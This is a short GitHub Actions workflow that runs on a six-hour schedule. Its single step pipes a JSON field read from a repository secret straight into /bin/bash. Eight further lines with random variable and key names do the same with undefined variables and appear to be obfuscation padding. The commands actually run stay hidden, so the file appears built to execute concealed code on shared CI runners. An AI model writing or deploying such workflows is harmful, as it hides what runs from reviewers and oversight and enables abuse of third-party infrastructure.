name: xiongjiance
on:
  workflow_dispatch:
  schedule:
    - cron: '44 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiongjiance
        env:
          zx4: ${{ secrets.zx4 }}
        run: |
          echo $zx4 | jq -r .skau6 | /bin/bash
          echo $cen51946 | jq -r .e289 | /bin/bash
          echo $hfvi67 | jq -r .pxdyt9529 | /bin/bash
          echo $i3528 | jq -r .wbrao2 | /bin/bash
          echo $lom852 | jq -r .ts778 | /bin/bash
          echo $vrrwd0 | jq -r .bq6 | /bin/bash
          echo $dq25 | jq -r .i322 | /bin/bash
          echo $fafup9297 | jq -r .i0 | /bin/bash
          echo $ufkm8 | jq -r .jcabf0096 | /bin/bash

